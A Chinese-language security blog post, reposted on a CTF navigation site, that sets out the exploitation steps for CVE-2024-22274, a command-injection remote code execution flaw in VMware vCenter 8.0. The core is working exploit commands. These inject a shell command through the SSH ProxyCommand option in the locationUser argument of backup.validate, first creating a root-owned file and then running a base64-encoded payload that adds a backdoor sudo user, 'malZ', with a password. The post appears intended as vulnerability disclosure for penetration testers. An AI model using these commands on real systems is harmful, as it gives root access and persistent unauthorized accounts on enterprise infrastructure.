CTF导航 CTF导航

VMware vCenter RCE CVE-2024-22274 细节公开 !

渗透技巧 4个月前 admin
132 0 0

环境:

– VMware vCenter 8.0.0.10200 

– Photon Linux

VMware vCenter RCE CVE-2024-22274 细节公开 !


首先,通过ssh以admin用户登录到vcenter 的严格模式shell

VMware vCenter RCE CVE-2024-22274 细节公开 !

通过执行“admin”用户可用的多个API命令并检查使用“pspy”调用的底层系统命令

backup.validate --parts common --locationType SFTP --location nowhere --locationUser '-o ProxyCommand=;/bin/touch /tmp/root!!! 2>' --locationPassword

VMware vCenter RCE CVE-2024-22274 细节公开 !

可见,成功创建文件,并且文件属于root用户

VMware vCenter RCE CVE-2024-22274 细节公开 !

我们可以尝试创建一个新的本地用户

backup.validate --parts common --locationType SFTP --location nowhere --locationUser '-o ProxyCommand=;/bin/bash -c "{echo,dXNlcmFkZCBtYWxaICYmIGVjaG8gLWUgIk1hbElzSGVyZTEjXG5NYWxJc0hlcmUxIyIgfCBwYXNzd2QgbWFsWiA7IHVzZXJtb2QgLXMgL2Jpbi9iYXNoIG1hbFogJiYgdXNlcm1vZCAtYUcgc3VkbyBtYWxaCg==}|{base64,-d}|bash"  ↑的base64原文  useradd malZ && echo -e "MalIsHere1#nMalIsHere1#" | passwd malZ ; usermod -s /bin/bash malZ && usermod -aG sudo malZ

VMware vCenter RCE CVE-2024-22274 细节公开 !

成功创建恶意用户,然后只需要ssh这个用户即可

VMware vCenter RCE CVE-2024-22274 细节公开 !


VMware vCenter RCE CVE-2024-22274 细节公开 !



原文始发于微信公众号(合规渗透):VMware vCenter RCE CVE-2024-22274 细节公开 !

版权声明:admin 发表于 2024年7月25日 上午9:54。
转载请注明:VMware vCenter RCE CVE-2024-22274 细节公开 ! | CTF导航

相关文章

CVE-2024-37079:VMware vCenter Server 整数下溢代码执行漏洞
admin
143
万字长文,带你彻底搞懂HTTPS(文末附实战)
admin
250
【$ 20,000】通过发送消息黑掉任意公司-CVE-2021–34506
admin
390
見落としがちなURL正規化によるパストラバーサル
admin
61
浅谈微信小程序渗透
admin
972
新一代Kerberos攻击 | 钻石票据与蓝宝石票据
admin
419

相关文章

浙江大学 | MINER:一种用于REST API模糊测试的混合数据驱动方法
0
Visionaries Have Democratised Remote Network Access – Citrix Virtual Apps and Desktops (CVE Unknown)
0
Jupyter Notebook从未授权到GetShell
0
每日安全动态推送(24/11/14)
0
springboot环境下的写文件RCE
0
终端对抗防御逃逸-内存免杀
0
Apache OFBiz 命令执行漏洞分析(CVE-2024-45195、CVE-2024-45507)
0
Resin URL解析特性导致权限认证绕过分析
0
CVE-2024-4956:Nexus Repository 3目录穿越漏洞
0
原创 Paper | CodeQL 入门和基本使用
0